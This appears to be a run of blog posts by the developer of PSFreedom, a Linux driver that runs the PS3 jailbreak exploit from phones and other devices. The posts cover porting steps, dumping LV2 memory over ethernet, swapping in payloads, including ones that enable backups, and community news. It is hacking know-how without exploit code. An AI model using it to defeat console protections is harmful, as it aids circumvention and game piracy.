To dump LV2, I used a trick and algorithms found by marcan42, so big thanks goes to him, as well as many other people who helped me out, RichDevX and Aaron in particular. I used RichDevX’s idea of ignoring the JIG and bruteforcing the address in which the port1 descriptor gets stored until I get a hit, then use that payload to dump lv2, then find the right JIG offset for that particular firmware from the dump. Marcan’s trick was to send the data through the ethernet cable by using LV1 only hypercalls, and it worked!

Now the latest git version of PL3 has a new ‘dump_lv2’ payload which you can use, it is firmware independent, and only uses LV1 hypercalls, so it should just work… It will dump all the lv2 memory through ethernet, so fire up wireshark, save the dump to a .pcap file, and use the tool in PL3/tools to extract the memory dump from the .pcap file.

In other news, I will soon upload to Ps3utils an .idc script that will search and find the syscall table, and correctly resolve all of its functions and name them properly.. maybe even have it automatically find all functions of a dump in order to save time creating procs in IDA. I’ll let you know once I’m done with it.

KaKaRoTo

PSFreedom news, homebrew and donations

Hi all,

I suppose many people are now following my blog and you’re all eager to learn more about the latest PSFreedom news!

Important things first : Please stop asking me if PSFreedom will work on your phone, NO it will not work on any Symbian phones and it won’t work on iPhones (see next paragraph though). Stop asking and just accept that and buy yourself a Teensy board or an AT90USB microcontroller or similar and install PSGroove on it, then you’ll have your own dedicated dongle.

Now that that’s out of the way, let’s get back to business! I told you last time that NTAuthority almost had the iPhoneLinux port working, well the good news is that it does indeed work and it’s been released! Please read the instructions to get it installed from the wiki. Note however that it only works on iPod Touch 1G, iPhone 2G and iPhone 3G, it will not work on iPhone 3GS or 4G or any other iPod… so please don’t even ask about it!!!!

In similar news, we’ve added support for many new Android devices, the list almost reaches 40 models, and about 25 unique devices are now PSFreedom compatible! Again, you can see the whole list of supported devices in the wiki. I just want to make one thing clear : I made PSFreedom for the N800/N810/N900 phones, but I didn’t port it to android. Although I helped some developers port PSFreedom to new USB controllers, I didn’t port or compile any build of PSFreedom for any Android device, so your thanks should go to those responsible for doing it. This is a community effort and those from the community who helped this project should receive our thanks!

Now, what you’ve been waiting for, what’s new in the  PS3 scene, well, many things. First, I’ve recently joined the group of Mathieulh and I’ve been working with them to figure out how the kernel and payload works! I’ve also recently created a new branch in git for writing custom assembly for the payloads instead of using the hardcoded binary blob from PSJailbreak. I’ve cleaned up the payload used by PSJailbreak as well as documented it so others can read it and better understand how it works. The reverse engineering and information has been provided by the group of Mathieulh as well as some of my own reverse engineering work. You can find the ASM payload file here. AerialX from the PSGroove team is also working on cool payloads so you should check out his git repository too!

Also, Matsy and I have reverse engineered the xRegistry.sys file format and are now able to modify the XMB registry in order to enable new features (QA mode, debug options, etc..), and we’ll be working in the next few days on making a homebrew application that would allow you to change these settings safely.

Now for the sad news.. I will be forced to update my PS3 system very soon, for multiple reasons.. First, I’m getting the PS Move tomorrow and I really want to buy Tumble (PSN game) which looks like an awesome game and I can’t do that if I don’t upgrade my PS3 since PSN is locked for firmware 3.41. I also am a PSN+ subscriber and not being able to connect to PSN and enjoy the content I paid for is absurd and it feels like it’s wasting those 50$ I paid for PSN+. Finally, I had to reformat (and restore from backup, Thank God) my PS3 hardrive yesterday because as I was testing the payloads, I kept crashing the PS3 and I kept shutting it down the hard way which seemed to have corrupted my hard drive. After I restored my backup, all my content is there, but when I try to launch a game it says “To access this content, you must active this system. Go to ‘Playstation Network->Account Management’ to activate this system”, which I cannot do without connecting to PSN. This basically means that the 50+ games that I have bought on PSN are now inaccessible to me. So for all these reasons, I have chosen to update my PS3 to the latest firmware version.

As you all know by now, Sony has fixed the vulnerability we’re using to run homebrew in the latest firmware update, which means that once I update, I won’t be able to use PSFreedom or run homebrew applications anymore. This means that I won’t be able to work anymore on homebrew and custom payloads.. I could try to write something but I won’t be able to use it or test it, so the motivation will not be the same. For that, I’m asking you, those of you who used and enjoyed PSFreedom and are grateful for it or those who would like to see more of my work in the future, that you please donate a little something. Your donation will be used in order to buy a new PS3 that will be used only for homebrew and development. Note that I am not requesting you to donate, you have no obligations to do so and I’m not promising you anything either in exchange for a donation. Also note that, as stated earlier, I do not make ports of PSFreedom to new devices/phones, so don’t hope or expect me to make it work for your phone because you donated something. So only donate to me if you are grateful for everything I’ve done so far and you want to show your appreciation. If you decide to donate to me, then thank you very much! Your donations are very much appreciated and they might allow me to release something cool and useful to the PS3 homebrew scene in the future (but I can’t guarantee anything to anyone of course).

So if you want to donate some money, just click on the Donate button below! If you want to donate some hardware (a PS3 maybe, or a Teensy board or anything), contact me and let me know.

Thank you all for your support!
KaKaRoTo

PSFreedom 1.0 and lots of news!

Hi all,

I’ve wanted to post about PSFreedom for the last 4 days now but everytime there’s something that prevents me from doing so.. there is so much happening that it’s hard to keep up and I’ve been overwhelmed by the reaction!

PSFreedom has seen a tremendous success, it’s been featured on multiple news sites  including Engadget, we’ve had a huge number of ‘fans’ (more like leechers:p) popping up on the newly created IRC channel (#PSFreedom @ irc.freenode.net). Someone (devz3ro) donated a domain and web hosting for our new http://psfreedom.com/wiki website. The number of people who have worked hard to create a beautiful and well organized wiki to keep track of all the ports. The number of  people who have tried (and many succeeded) to port PSFreedom to so many different devices and those who sent me pull requests on github as well as those who simply read my code and reviewed it and decided to comment on my commits so I can improve the code.

Anyways, it has been a tremendous success, real community work and I want to thank personally everyone involved, everyone who helped, whether it be with a small or a big contribution to the project.

Now about the news, I have quite a few… first, a lot of people are asking me how to get this working on the N800 and N810! Well, it’s been working for a few days now, but the mass storage driver was conflicting and made the controller unstable. However, today, drizztbsd contributed a patch that fixes this issue (by killing hald-addon-usb) without modifying any file from your system, so enabling the exploit on the N800, N810 and N900 is all a matter of running the ./psfreedom-enable-maemo.sh script! There is also an easy to use graphical application that should be released today by MohammadAG and a special thank you to Bash who also contributed the PSFreedom logo.

I have also received a ton of requests from people to port this to the iPhone and/or one of their Symbian devices… my answer to that is : RTFM!! In other words, no it is simply *impossible*. It can only be ported to other Linux devices. However, we are close to having it work with IphoneLinux (actually, I just got confirmation a few seconds ago that it’s finally working) as NTAuthority spent countless hours porting it and fixing the controller’s incomplete driver in order to make this work. Once his port is finished, and stable, he will make it available to everyone, so stay tuned and follow the Device compatibility list on the wiki!

Other good news, PSFreedom has been ported to a huge amount of devices already, and the list keeps growing every day! We currently support and have working binaries for not only the N800/N810/N900 but also the Palm Pre, Archos 5 (Generation 6), Archos 5 IMT (Generation 7), as well as, thanks to the work of DocMon in porting PSFreedom to the MSM72K controller, The HTC Desire (Bravo), Nexus One, HTC Dream (G1), HTC Sapphire (HTC Magic 32A/32B), HTC HD2 (running Android), HTC Wildfire and I’ve received confirmation a few minutes ago that it’s been successfully ported to the HTC Evo as well as HTC Diamond. Also, waninkoko recently ported PSFreedom to work on the Dingoo open game console.

For the future, you can expect a lot more devices to be supported, like the iPhone/iPod (Through iPhoneLinux only) as well as the Gp2x Wiz game console, and the huge list of compatible devices available in our wiki. Also note that running the PSFreedom on an Android device isn’t as easy as it is on the N900, you need to flash some nandroid thing, then flash a custom kernel (because Android’s kernel sucks) then run PSFreedom in that environment, then run Nandroid again to restore your system… It is quite complicated but many people are working on making it much simpler to do, the famous AmonRA contacted me and said he started working on building a PSFreedom-compatible recovery image with a menu item to enable/disable the PSFreedom functionality.

There is one last  important bit of news I want to share with you : PSFreedom 1.0 has been released (more like tagged) and it adds support for many devices, the Makefile allows you to build for a specific platform by specifying it as a target, ‘make N900’ or ‘make Desire’ or ‘make Dingoo’ will build it for your needs with the right configuration. Also more importantly, this version will allow you to customize which payload or shellcode you want to send to your PS3 during the exploit. Many people have requested a version that allows you to play backups, while the original release of PSFreedom didn’t allow that, it quickly got patched to allow the backup manager to work. The new release of the PSGroove yesterday also adds 2 system calls that allows user space application to modify the GameOS kernel, and that meant a new payload is available for developers. This version of PSFreedom provides all these payloads and you can choose which one to set by simply copying it to /proc/psfreedom/payload once the module has been loaded. The same also applies to the shellcode.

That’s it for now, there are a ton of other news I’d like to share, but this post is long enough and I’d like to keep some surprises for next time!

Thanks to all for your support!

KaKaRoTo

PSFreedom source code released!

Hi again,

As promised yesterday, I’ve just released the source code for PSFreedom. You can grab it now on github.

If you want to port it to work on another device, then fork the repository and start working, you can send me a pull request once it’s done. See the end of this post for a little howto on porting it to a new device.

I have also decided to remove that video I put yesterday on youtube. I didn’t give the link to anyone, but somehow people found it and it got linked on multiple news sites… that video is useless, hard to watch, and I’m sorry! I’ve made a new video that you can view here :

Since yesterday I’ve been spammed with emails, comments on my blog, PMs and pings on IRC, etc.. and my server even went down (doesn’t seem to be because of high traffic). So I’d like to answer everyone with this FAQ :

Q : What is your relationship with the PSGroove project ?

A: PSGroove was released a while ago while I was already working (about 50% done) on PSFreedom. I had help from Mathieulh and Phire from the PSGroove team, who gave me insight on what the jailbreak does. When PSGroove was released, I read its code to understand what it does and to make sure my code worked in the same way. I copied the descriptors and payload from the code of PSGroove, and I give them credit for what they did, and for what I copied from their project. I set my license to GPL v3 to match theirs, and I gave credits to those who helped me on IRC. However, I say and I insist that PSFreedom is not a port of PSGroove, because I never took their code and ported it to the N900, this is my original work, and I wrote all of its code from scratch. Some of the PSGroove team seem to be in conflict with me because of that, they insist that “if you looked at our code, then it is a without question a port of PSGroove”, and I believe we have two very different understanding of the term ‘port’.

Q : Can/when is it going to work on the iPhone/Symbian/My phone ?

A: PSFreedom is a  Linux driver, so it will only work on Linux-enabled devices.. which means, not on iOS, and not on Symbian, so please stop asking about that!

Q: Will it work on the 770/N800/N810 ?

A: I only did this for the N900, I might port it to other devices, but right now, I cannot give any guarantees to anyone that it will be ported or that it will work on another device… The source code has been released and whoever wants to contribute can go ahead, fork my repository, and send me a pull request when you got something working.

These are linux devices, so yes, it should work, but just like any other device, they use a different controller than the N900, so a little porting will be necessary.

Q: Will it work from a linux PC ?

A: Unfortunately, no, most PCs have a USB controller  that only supports Host mode, but you need Slave mode to be able to make this work.

Q: Can I run backups with this ?

A: At the moment, no, I have used the same payload as PSGroove, which means backups are disabled, although someone already released a version of PSFreedom with backups enabled. In the future, I will hopefully  make the module load any payload at runtime, this way you could choose between different payloads.

Q: Can you make it easier to use ?

A: Me? No.. someone else? Yes.. there is already someone working on a UI for PSFreedom, and it will be available once it’s ready.

Q: What do I need to use PSFreedom on my N900 ?

A: First, you need a N900 (duh) and a PS3 (duh) with firmware 3.41. The N900 should be running the stock kernel (-omap1) not a modified kernel. Then you just need to scp the files to the N900 and run the -enable script.

Q: How much of the source is Nokia N900 specific? Are you using the Linux USB Gadgets library?

A: Very little is N900 specific, I’m using the include/linux/gadget.h if that’s what you mean. See next Q/A for more info.

Q: How hard is it to port it to a new device ?

A: Well, I’ve just separated my code from the N900 specific stuff, so it’s quite easy, there are mainly two functions to write, one to get and one to set the USB address.. two other functions that only return some static result depending on the configuration of the controller (the name of the endpoints, and whether the controller supports high speed or full speed mode).

Read the README file provided with PSFreedom, and check the psfreedom_machine.c file for specifics on what to implement.

Q: How can I port it to a new device.

A: Well, first, you need to figure out what controller your device uses, in the case of the N900, it’s ‘musb’..

Then go to the driver code for that controller (probably in drivers/usb/gadget) and look for ‘SET_ADDRESS’. In the case of musb, it was in drivers/usb/musb/musb_gadget_ep0.c. In there it was setting the address to the USB device, so just copy that code into the psfreedom_machine.c to allow setting the address, and add a similar function to be able to retreive the address.

Then add a function to return 0 or 1 depending on whether the controller supports HIGH, FULL or LOW speed mode (go to usb_gadget_register_driver for your controller, and in the first lines, it should validate the speed argument, it will tell you which ones are acceptable), set LOW speed mode to return TRUE only if FULL speed isn’t available .

Finally, add a function to return the endpoint names.. it will usually be something like ‘epXin’ and ‘epXout’ (where X is the endpoint number), or “epXin-bulk”, etc.. look at how the driver initializes its endpoints or grep for “->name” in the file to find where it sets it…

That should be enough!

Ok this is it for now with the FAQ. Next time, I’ll tell you all about my experience, what problems I encountered and how I fixed them, maybe it will help others!

Enjoy it!

KaKaRoTo